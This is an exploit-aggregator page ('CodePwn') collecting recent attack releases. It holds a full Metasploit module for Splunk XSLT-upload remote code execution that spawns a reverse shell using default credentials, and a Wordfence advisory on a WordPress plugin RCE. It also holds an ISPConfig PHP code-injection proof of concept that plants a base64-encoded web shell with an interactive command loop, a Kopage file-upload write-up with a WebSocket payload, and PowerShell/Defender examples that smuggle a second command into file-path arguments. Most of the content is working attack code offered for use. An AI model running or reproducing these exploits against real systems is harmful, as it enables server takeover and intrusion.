Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Splunk Authenticated XSLT Upload RCE', 'Description' => %q{ This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise. The affected versions include 9.0.x before 9.0.7 and 9.1.x before 9.1.2. The exploitation process leverages a weakness in the XSLT transformation functionality of Splunk. Successful exploitation requires valid credentials, typically 'admin:changeme' by default. The exploit involves uploading a malicious XSLT file to the target system. This file, when processed by the vulnerable Splunk server, leads to the execution of arbitrary code. The module then utilizes the 'runshellscript' capability in Splunk to execute the payload, which can be tailored to establish a reverse shell. This provides the attacker with remote control over the compromised Splunk instance. The module is designed to work seamlessly, ensuring successful exploitation under the right conditions. }, 'Author' => [ 'nathan', # Writeup and PoC 'Valentin Lobstein', # Metasploit module 'h00die', # Assistance in module development ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2023-46214'], ['URL', 'https://github.com/nathan31337/Splunk-RCE-poc'], ['URL', 'https://advisory.splunk.com/advisories/SVD-2023-1104'], # Vendor Advisory ['URL', 'https://blog.hrncirik.net/cve-2023-46214-analysis'], # Writeup ], 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_PHP, ARCH_CMD], 'Targets' => [['Automatic', {}]], 'DisclosureDate' => '2023-11-28', 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 8000 }, 'Privileged' => false, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options( [ OptString.new('USERNAME', [true, 'Username for Splunk', 'admin']), OptString.new('PASSWORD', [true, 'Password for Splunk', 'changeme']), OptString.new('RANDOM_FILENAME', [false, 'Random filename with 8 characters', Rex::Text.rand_text_alpha(8)]), ] ) end def exploit cookie_string ||= authenticate unless cookie_string fail_with(Failure::NoAccess, 'Authentication failed') end sleep(0.3) csrf_token, updated_cookie_string = fetch_csrf_token(cookie_string) unless csrf_token fail_with(Failure::NoAccess, 'Failed to obtain CSRF token') end sleep(0.3) malicious_xsl = generate_malicious_xsl text_value = upload_malicious_file(malicious_xsl, csrf_token, updated_cookie_string) unless text_value fail_with(Failure::Unknown, 'File upload failed') end sleep(0.3) jsid = get_job_search_id(csrf_token, updated_cookie_string) unless jsid fail_with(Failure::Unknown, 'Creating job failed') end sleep(0.3) unless trigger_xslt_transform(jsid, text_value, updated_cookie_string) fail_with(Failure::Unknown, 'XSLT Transform failed') end sleep(0.3) unless trigger_payload(jsid, csrf_token, updated_cookie_string) fail_with(Failure::Unknown, 'Failed to execute reverse shell') end end def check unless splunk? return CheckCode::Unknown('Target does not appear to be a Splunk instance') end begin cookie_string = authenticate rescue RuntimeError cookie_string = nil end unless cookie_string return CheckCode::Detected('The target is Splunk but authentication failed') end version = get_version_authenticated(cookie_string) return CheckCode::Detected('Unable to determine Splunk version') unless version if version.between?(Rex::Version.new('9.0.0'), Rex::Version.new('9.0.6')) || version.between?(Rex::Version.new('9.1.0'), Rex::Version.new('9.1.1')) return CheckCode::Appears("Exploitable version found: #{version}") end CheckCode::Safe("Non-vulnerable version found: #{version}") end def trigger_payload(jsid, csrf_token, cookie_string) return nil unless jsid && csrf_token runshellscript_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'servicesNS', datastore['USERNAME'], 'search', 'search', 'jobs') runshellscript_data = { 'search' => "|runshellscript \"#{datastore['RANDOM_FILENAME']}.sh\" \"\" \"\" \"\" \"\" \"\" \"\" \"\" \"#{jsid}\"" } upload_headers = { 'X-Requested-With' => 'XMLHttpRequest', 'X-Splunk-Form-Key' => csrf_token, 'Cookie' => cookie_string } print_status("Executing payload at #{runshellscript_url}") res = send_request_cgi( 'uri' => runshellscript_url, 'method' => 'POST', 'vars_post' => runshellscript_data, 'headers' => upload_headers ) unless res print_error('Failed to execute payload: No response received') return nil end if res.code == 201 print_good('Payload executed successfully') return true end print_error("Failed to execute payload: Server returned status code #{res.code}") return nil end def trigger_xslt_transform(jsid, text_value, cookie_string) return nil unless jsid && text_value exploit_endpoint = normalize_uri(target_uri.path, 'en-US', 'api', 'search', 'jobs', jsid, 'results') exploit_endpoint << "?xsl=/opt/splunk/var/run/splunk/dispatch/#{text_value}/#{datastore['RANDOM_FILENAME']}.xsl" xslt_headers = { 'X-Splunk-Module' => 'Splunk.Module.DispatchingModule', 'Connection' => 'close', 'Upgrade-Insecure-Requests' => '1', 'Accept-Language' => 'en-US,en;q=0.5', 'Accept-Encoding' => 'gzip, deflate', 'X-Requested-With' => 'XMLHttpRequest', 'Cookie' => cookie_string } print_status("Triggering XSLT transformation at #{exploit_endpoint}") res = send_request_cgi( 'uri' => exploit_endpoint, 'method' => 'GET', 'headers' => xslt_headers ) unless res print_error('Failed to trigger XSLT transformation: No response received') return nil end if res.code == 200 print_good('XSLT transformation triggered successfully') return true end print_error("Failed to trigger XSLT transformation: Server returned status code #{res.code}") return nil end def generate_malicious_xsl encoded_payload = Rex::Text.html_encode(payload.encoded) xsl_template = <<~XSL <?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl"> <xsl:template match="/"> <exsl:document href="/opt/splunk/bin/scripts/#{datastore['RANDOM_FILENAME']}.sh" method="text"> <xsl:text>#{encoded_payload}</xsl:text> </exsl:document> </xsl:template> </xsl:stylesheet> XSL xsl_template end def get_job_search_id(csrf_token, cookie_string) return nil unless csrf_token jsid_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'servicesNS', datastore['USERNAME'], 'search', 'search', 'jobs') upload_headers = { 'X-Requested-With' => 'XMLHttpRequest', 'X-Splunk-Form-Key' => csrf_token, 'Cookie' => cookie_string } jsid_data = { 'search' => '|search test|head 1' } print_status("Sending job search request to #{jsid_url}") res = send_request_cgi( 'uri' => jsid_url, 'method' => 'POST', 'vars_post' => jsid_data, 'headers' => upload_headers, 'vars_get' => { 'output_mode' => 'json' } ) unless res print_error('Failed to initiate job search: No response received') return nil end jsid = res.get_json_document['sid'] return jsid if jsid end def upload_malicious_file(file_content, csrf_token, cookie_string) unless csrf_token print_error('CSRF token not found') return nil end post_data = Rex::MIME::Message.new post_data.add_part(file_content, 'application/xslt+xml', nil, "form-data; name=\"spl-file\"; filename=\"#{datastore['RANDOM_FILENAME']}.xsl\"") upload_headers = { 'Accept' => 'text/javascript, text/html, application/xml, text/xml, */*', 'X-Requested-With' => 'XMLHttpRequest', 'X-Splunk-Form-Key' => csrf_token, 'Cookie' => cookie_string } upload_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__upload', 'indexing', 'preview') res = send_request_cgi( 'uri' => upload_url, 'method' => 'POST', 'data' => post_data.to_s, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'headers' => upload_headers, 'vars_get' => { 'output_mode' => 'json', 'props.NO_BINARY_CHECK' => 1, 'input.path' => "#{datastore['RANDOM_FILENAME']}.xsl" } ) unless res print_error('Malicious file upload failed: No response received') return nil end if res.headers['Content-Type'].include?('application/json') response_data = res.get_json_document else print_error('Response is not in JSON format') return nil end if response_data.empty? print_error('Failed to parse JSON or received empty JSON') return nil end if response_data['messages'] && !response_data['messages'].empty? text_value = response_data.dig('messages', 0, 'text') if text_value.include?('concatenate') print_error('Server responded with an error: concatenate found in the response') return nil end print_good('Malicious file uploaded successfully') return text_value end print_error('Server did not return a valid "messages" field') return nil end def fetch_csrf_token(cookie_string) print_status('Extracting CSRF token from cookies') csrf_token_match = cookie_string.match(/splunkweb_csrf_token_8000=([^;]+)/) if csrf_token_match csrf_token = csrf_token_match[1] print_good("CSRF token successfully extracted: #{csrf_token}") en_us_url = normalize_uri(target_uri.path, 'en-US', 'app', 'launcher', 'home') res = send_request_cgi({ 'method' => 'GET', 'uri' => en_us_url, 'cookie' => cookie_string }) updated_cookie_string = cookie_string if res && res.code == 200 new_cookies = res.get_cookies updated_cookie_string += new_cookies end return [csrf_token, updated_cookie_string] end fail_with(Failure::NotFound, 'CSRF token not found in cookies') end def get_version_authenticated(cookie_string) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/en-US/splunkd/__raw/services/authentication/users/', datastore['USERNAME']), 'vars_get' => { 'output_mode' => 'json' }, 'headers' => { 'Cookie' => cookie_string } }) return nil unless res&.code == 200 body = res.get_json_document Rex::Version.new(body.dig('generator', 'version')) end def splunk? res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/en-US/account/login') }) return true if res&.body =~ /Splunk/ false end def authenticate login_url = normalize_uri(target_uri.path, 'en-US', 'account', 'login') res = send_request_cgi({ 'method' => 'GET', 'uri' => login_url }) unless res fail_with(Failure::Unreachable, 'No response received for authentication request') end cval_value = res.get_cookies.match(/cval=([^;]*)/)[1] unless cval_value fail_with(Failure::UnexpectedReply, 'Failed to retrieve the cval cookie for authentication') end auth_payload = { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], 'cval' => cval_value, 'set_has_logged_in' => 'false' } res = send_request_cgi({ 'method' => 'POST', 'uri' => login_url, 'cookie' => res.get_cookies, 'vars_post' => auth_payload }) unless res && res.code == 200 fail_with(Failure::NoAccess, 'Failed to authenticate on the Splunk instance') end print_good('Successfully authenticated on the Splunk instance') res.get_cookies end end </code></pre>

<pre><code>Vulnerability Summary from Wordfence Intelligence Description: Backup Migration <= 1.3.7 backup-backup Unauthenticated Remote Code Execution Affected Plugin: Backup Migration Plugin Slug: backup-backup Affected Versions: <= 1.3.7 CVE ID:CVE-2023-6553 Pending CVSS Score: 9.8 (Critical) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Researcher/s: Nex Team Fully Patched Version: 1.3.8 Bounty Award: $2,751.00 The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server. Technical Analysis Line 118 within the /includes/backup-heart.php file used by the Backup Migration plugin attempts to include bypasser.php from the BMI_INCLUDES directory. The BMI_INCLUDES directory is defined by concatenating BMI_ROOT_DIR with the includes string on line 64. However, note that BMI_ROOT_DIR is defined via the content-dir HTTP header on line 62. affected_code_image_2 This means that the BMI_ROOT_DIR is user-controllable. By submitting a specially-crafted request, threat-actors can leverage this issue to include arbitrary, malicious PHP code and execute arbitrary commands on the underlying server in the security context of the WordPress instance. Disclosure Timeline December 5, 2023 – We receive the submission of the PHP Code Injection vulnerability in Backup Migration via the Wordfence Bug Bounty Program. December 6, 2023 – We validate the report and confirm the proof-of-concept exploit. December 6, 2023 – We initiate contact with the plugin developer and send over the full disclosure details. The vendor acknowledges the report and begins working on a fix. A fully patched version of the plugin, 1.3.8, is released. Conclusion In this blog post, we detailed a critical PHP Code Injection vulnerability within the Backup Migration plugin affecting versions 1.3.7 and earlier. This vulnerability allows unauthenticated threat actors to inject arbitrary PHP code, resulting in a full site compromise. The vulnerability has been fully addressed in version 1.3.8 of the plugin. We urge WordPress users to verify that their sites are updated to the latest patched version of Backup Migration. Wordfence users running Wordfence Premium , Wordfence Care , and Wordfence Response have been protected against these vulnerabilities as of December 6, 2023. Users still using the free version of Wordfence will receive the same protection on January 5, 2024. If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk. </code></pre>

<pre><code>------------------------------------------------------------------------ ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability ------------------------------------------------------------------------ [-] Software Link: https://www.ispconfig.org [-] Affected Versions: Version 3.2.11 and prior versions. [-] Vulnerabilities Description: User input passed through the "records" POST parameter to /admin/language_edit.php is not properly sanitized before being used to dynamically generate PHP code that will be executed by the application. This can be exploited by malicious administrator users to inject and execute arbitrary PHP code on the web server. [-] Proof of Concept: https://karmainsecurity.com/pocs/CVE-2023-46818.php (Packet Storm Editor Note: See bottom of this file for PoC) [-] Solution: Upgrade to version 3.2.11p1 or later. [-] Disclosure Timeline: [25/10/2023] - Vendor notified [26/10/2023] - Version 3.2.11p1 released [27/10/2023] - CVE identifier assigned [07/12/2023] - Publication of this advisory [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2023-46818 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Original Advisory: https://karmainsecurity.com/KIS-2023-13 [-] Other References: https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/ --- CVE-2023-46818.php PoC --- <?php /* ------------------------------------------------------------------------ ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability ------------------------------------------------------------------------ author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......: https://www.ispconfig.org +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerability Description: User input passed through the "records" POST parameter to /admin/language_edit.php is not properly sanitized before being used to dynamically generate PHP code that will be executed by the application. This can be exploited by malicious administrator users to inject and execute arbitrary PHP code on the web server. [-] Original Advisory: https://karmainsecurity.com/KIS-2023-13 */ set_time_limit(0); error_reporting(E_ERROR); if (!extension_loaded("curl")) die("[-] cURL extension required!\n"); if ($argc != 4) die("\nUsage: php $argv[0] <URL> <Username> <Password>\n\n"); list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]]; print "[+] Logging in with username '{$user}' and password '{$pass}'\n"; @unlink('./cookies.txt'); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "{$url}login/"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt'); curl_setopt($ch, CURLOPT_POSTFIELDS, "username=".urlencode($user)."&password=".urlencode($pass)."&s_mod=login"); if (preg_match('/Username or Password wrong/i', curl_exec($ch))) die("[-] Login failed!\n"); print "[+] Injecting shell\n"; $__phpcode = base64_encode("<?php print('____'); passthru(base64_decode(\$_SERVER['HTTP_C'])); print('____'); ?>"); $injection = "'];file_put_contents('sh.php',base64_decode('{$__phpcode}'));die;#"; $lang_file = str_shuffle("qwertyuioplkjhgfdsazxcvbnm").".lng"; curl_setopt($ch, CURLOPT_URL, "{$url}admin/language_edit.php"); curl_setopt($ch, CURLOPT_POSTFIELDS, "lang=en&module=help&lang_file={$lang_file}"); $res = curl_exec($ch); if (!preg_match('/_csrf_id" value="([^"]+)"/i', $res, $csrf_id)) die("[-] CSRF ID not found!\n"); if (!preg_match('/_csrf_key" value="([^"]+)"/i', $res, $csrf_key)) die("[-] CSRF key not found!\n"); curl_setopt($ch, CURLOPT_POSTFIELDS, "lang=en&module=help&lang_file={$lang_file}&_csrf_id={$csrf_id[1]}&_csrf_key={$csrf_key[1]}&records[%5C]=".urlencode($injection)); curl_exec($ch); print "[+] Launching shell\n"; curl_setopt($ch, CURLOPT_URL, "{$url}admin/sh.php"); curl_setopt($ch, CURLOPT_POST, false); while(1) { print "\nispconfig-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode($cmd)]); preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } </code></pre>

<pre><code>## Title: Kopage-Website-Builder-4.4.15-File-Upload-RCE ## Author: nu11secur1ty ## Date: 12/08/2023 ## Vendor: https://www.kopage.com/ ## Software: https://demo.kopage.com/index.php ## Reference: https://portswigger.net/web-security/file-upload, https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload ## Description: The file upload function suffers from file upload vulnerability, there is no strong sanitizing function for uploading some extension files. In this case, I uploaded an HTML web socket client on their server and then I connected this client with my javascript server =) Depending on the scenario, this can be the end of privacy and even worse than ever! I am a Penetration Tester, not a stupid cracker! Thank you all! STATUS: CRITICAL Vulnerability [+]Exploit client: ```POST <html> <script> (() => { const ws = new WebSocket('ws://0.0.0.0:8080') ws.onopen = () => { console.log('ws opened on browser') ws.send('hello world you are hacked :D') } ws.onmessage = (message) => { console.log(`message received ${message}`) } })() </script> </html> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kopage.com/Kopage-Website-Builder-4.4.15) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/12/kopage-website-builder-4415-file-upload.html) ## Time spent: 00:35:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> </code></pre>

<pre><code>[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt [+] twitter.com/hyp3rlinx [+] x.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows PowerShell [Vulnerability Type] Arbitrary Code Execution [CVE Reference] N/A [Security Issue] Microsoft Defender Anti Malware and or PS API's can result in executing arbitrary code. E.g. scan a directory, shortcut .lnk or even non-existent item, may execute unintended code. This vector builds upon my previous advisory and subsequent project PSTrojanFile. Requirements: 1) On CL 'powershell' cmd is prefixed or passed in by calling PowerShell from another script 2) Executable file of same name as the parameter that lives nearby Examples: powershell Start-MpScan -Scanpath "C:\Users\gg\Downloads\;saps Helper;.1.zip" (Helper.exe lives on Desktop) Create directory ";saps Test", Test.exe, Test.cmd etc is on same CL path powershell Add-MpPreference -ControlledFolderAccessAllowedApplications ";saps Test" Create directory with semicolon, drop PE file named doom.exe in same path. powershell Set-ProcessMitigation -PolicyFilePath "test;saps doom" TODO: Update PSTrojanFile [References] http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt https://github.com/hyp3rlinx/PSTrojanFile https://packetstormsecurity.com/files/153863/Microsoft-Windows-PowerShell-Command-Execution.html https://www.exploit-db.com/exploits/47248 https://github.com/MicrosoftDocs/windows-powershell-docs/tree/main/docset/winserver2019-ps/defender [Video PoC URL] https://www.youtube.com/watch?v=0Go6yJiRWP8 [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: circa (2019) December 7, 2023 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx </code></pre>